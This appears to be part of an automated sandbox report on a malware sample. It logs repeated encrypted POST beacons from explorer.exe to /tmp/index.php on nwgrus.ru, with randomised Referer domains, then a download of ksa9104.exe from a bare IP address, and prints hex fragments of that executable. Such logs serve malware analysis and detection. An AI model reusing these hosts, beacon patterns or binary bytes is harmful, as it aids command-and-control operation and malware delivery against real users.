                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.450654116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:38:09.241578102 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://wijyucejeixqcq.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 323
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:38:09.241612911 CEST323OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 78 43 c9 9b
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vuxC]'zIlzf=ljAUi{kwI:STOPK\Z07UVg+\ULZ/\;c-zc+sFl$oQ8!
                                                            Oct 11, 2024 06:38:10.504018068 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:38:10 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.450664116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:38:10.513645887 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://tvxqtlroqjamdu.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 131
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:38:10.513672113 CEST131OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 64 39 d1 ae
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA -[k,vud9DdxTlJ0^ps a02[*
                                                            Oct 11, 2024 06:38:12.056718111 CEST484INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:38:11 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.450850116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:39:20.253727913 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://qiqpuprruvmqycfg.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 239
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:39:20.253737926 CEST239OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 59 52 a2 ee
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA .[k,vuYRxfvqqE)QHV=`b@EPLu]%RfSh7@%E^y`u! ?9QvbT\O\7Mm7R
                                                            Oct 11, 2024 06:39:21.575018883 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:39:21 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.450851116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:39:27.307861090 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ducngusiibkxomb.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 204
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:39:27.307879925 CEST204OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 5c c6 a8
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA .[k,vus\\VYk^E?,D4;92H[z*R;S"`5X8#2)[lbK0=/
                                                            Oct 11, 2024 06:39:28.713341951 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:39:28 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.2.450852116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:39:35.071202993 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://itbfgbtaejscu.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 173
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:39:35.071230888 CEST173OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 2b ac b5
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA .[k,vu1+}`~`6!21g@2XgH]8aN)N3#pW2_/
                                                            Oct 11, 2024 06:39:36.315859079 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:39:36 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            37192.168.2.450853116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:39:43.732719898 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://fmklqfxisct.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 115
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:39:43.732743979 CEST115OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 2e ef a1
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA .[k,vub.~_Lq"ka{t>t/
                                                            Oct 11, 2024 06:39:44.998517036 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:39:44 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            38192.168.2.450854116.58.10.60802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:39:54.201596022 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ukccamwydghjkfi.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 253
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:39:54.201617956 CEST253OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 45 ba e0
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA .[k,vubEx*wL`.SO%nD@l\S.<E5(;PWG,]0rR>l23t{`s7'A42[e2>LX=k?>
                                                            Oct 11, 2024 06:39:55.430552006 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:39:55 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            39192.168.2.450855186.233.231.45802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:40:07.588702917 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://nkxctepgnvx.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 253
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:40:07.588721991 CEST253OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 0c e5 bd
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA .[k,vuN#\S!S[Svm:`RX$87oS>iW`,/yy*/V6|aqTBSQy}Y)_Eu4G6
                                                            Oct 11, 2024 06:40:08.776712894 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:40:08 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            40192.168.2.450856186.233.231.45802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:40:20.400799036 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ijdjdfrkcsdu.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 170
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:40:20.400823116 CEST170OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 54 3a c8 fc
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA .[k,vuT:xeAOb"\^ _a8E^xtY1BvU>4EZ)q,iO<
                                                            Oct 11, 2024 06:40:21.583488941 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:40:21 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            41192.168.2.450857186.233.231.45802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:40:33.590082884 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://virsnusoyawwgc.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 311
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:40:33.594959021 CEST311OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 14 be ac
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA .[k,vu<^aM}VIaHCX\%q*<q{Q\544'YOcUMVu['M]k7}RR9T,!
                                                            Oct 11, 2024 06:40:34.773993969 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:40:34 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            42192.168.2.450858186.233.231.4580
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:40:46.048886061 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://mtnalmdiriqcam.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 223
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:40:46.048918962 CEST223OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 1c e0 fc
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA .[k,vusY0|v3^-{Lsc)`1#[]3_:N3#zxCo\G^Yvr;W#V2"ajU~
                                                            Oct 11, 2024 06:40:47.321197987 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:40:47 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            43192.168.2.450859186.233.231.45802580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 11, 2024 06:40:58.699985027 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://chjuadirxhpxkwiq.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 122
                                                            Host: nwgrus.ru
                                                            Oct 11, 2024 06:40:58.699999094 CEST122OUTData Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 1e bd 99
                                                            Data Ascii: ;nTfa!uu}wb~|E[Xm+? 9Yt M@NA .[k,vuZ0jI?3\2s
                                                            Oct 11, 2024 06:40:59.976272106 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Fri, 11 Oct 2024 04:40:59 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.45057523.145.40.1644432580C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-11 04:37:57 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: 23.145.40.164
                                                            2024-10-11 04:37:57 UTC327INHTTP/1.1 200 OK
                                                            Date: Fri, 11 Oct 2024 04:37:57 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            Last-Modified: Fri, 11 Oct 2024 04:30:03 GMT
                                                            ETag: "3bc00-6242bf0d5f636"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 244736
                                                            Connection: close
                                                            Content-Type: application/x-msdos-program
                                                            2024-10-11 04:37:57 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d0 0e fe a1 94 6f 90 f2 94 6f 90 f2 94 6f 90 f2 8a 3d 14 f2 8e 6f 90 f2 8a 3d 05 f2 84 6f 90 f2 8a 3d 13 f2 de 6f 90 f2 b3 a9 eb f2 91 6f 90 f2 94 6f 91 f2 fb 6f 90 f2 8a 3d 1a f2 95 6f 90 f2 8a 3d 04 f2 95 6f 90 f2 8a 3d 01 f2 95 6f 90 f2 52 69 63 68 94 6f 90 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 91 22 b7 64 00 00 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ooo=o=o=oooo=o=o=oRichoPEL"d
                                                            2024-10-11 04:37:57 UTC8000INData Raw: 83 ec 14 56 57 ff 75 08 8d 4d ec e8 64 ff ff ff 8b 45 10 8b 75 0c 33 ff 3b c7 74 02 89 30 3b f7 75 2c e8 30 ea ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 aa 12 00 00 83 c4 14 80 7d f8 00 74 07 8b 45 f4 83 60 70 fd 33 c0 e9 d8 01 00 00 39 7d 14 74 0c 83 7d 14 02 7c c9 83 7d 14 24 7f c3 8b 4d ec 53 8a 1e 89 7d fc 8d 7e 01 83 b9 ac 00 00 00 01 7e 17 8d 45 ec 50 0f b6 c3 6a 08 50 e8 1a 2c 00 00 8b 4d ec 83 c4 0c eb 10 8b 91 c8 00 00 00 0f b6 c3 0f b7 04 42 83 e0 08 85 c0 74 05 8a 1f 47 eb c7 80 fb 2d 75 06 83 4d 18 02 eb 05 80 fb 2b 75 03 8a 1f 47 8b 45 14 85 c0 0f 8c 4b 01 00 00 83 f8 01 0f 84 42 01 00 00 83 f8 24 0f 8f 39 01 00 00 85 c0 75 2a 80 fb 30 74 09 c7 45 14 0a 00 00 00 eb 34 8a 07 3c 78 74 0d 3c 58 74 09 c7 45 14 08 00 00 00 eb 21 c7 45 14 10 00 00
                                                            Data Ascii: VWuMdEu3;t0;u,0WWWWW}tE`p39}t}|}$MS}~~EPjP,MBtG-uM+uGEKB$9u*0tE4<xt<XtE!E
                                                            2024-10-11 04:37:57 UTC8000INData Raw: a3 b8 9b 41 00 ff d6 50 e8 22 ec ff ff 59 a3 c0 9b 41 00 85 c0 74 14 68 94 68 41 00 57 ff d6 50 e8 0a ec ff ff 59 a3 bc 9b 41 00 a1 bc 9b 41 00 3b c3 74 4f 39 1d c0 9b 41 00 74 47 50 e8 68 ec ff ff ff 35 c0 9b 41 00 8b f0 e8 5b ec ff ff 59 59 8b f8 85 f6 74 2c 85 ff 74 28 ff d6 85 c0 74 19 8d 4d f8 51 6a 0c 8d 4d ec 51 6a 01 50 ff d7 85 c0 74 06 f6 45 f4 01 75 09 81 4d 10 00 00 20 00 eb 39 a1 b4 9b 41 00 3b c3 74 30 50 e8 18 ec ff ff 59 85 c0 74 25 ff d0 89 45 fc 85 c0 74 1c a1 b8 9b 41 00 3b c3 74 13 50 e8 fb eb ff ff 59 85 c0 74 08 ff 75 fc ff d0 89 45 fc ff 35 b0 9b 41 00 e8 e3 eb ff ff 59 85 c0 74 10 ff 75 10 ff 75 0c ff 75 08 ff 75 fc ff d0 eb 02 33 c0 5f 5e 5b c9 c3 8b ff 55 8b ec 8b 45 08 53 33 db 56 57 3b c3 74 07 8b 7d 0c 3b fb 77 1b e8 17 ca ff
                                                            Data Ascii: AP"YAthhAWPYAA;tO9AtGPh5A[YYt,t(tMQjMQjPtEuM 9A;t0PYt%EtA;tPYtuE5AYtuuuu3_^[UES3VW;t};w
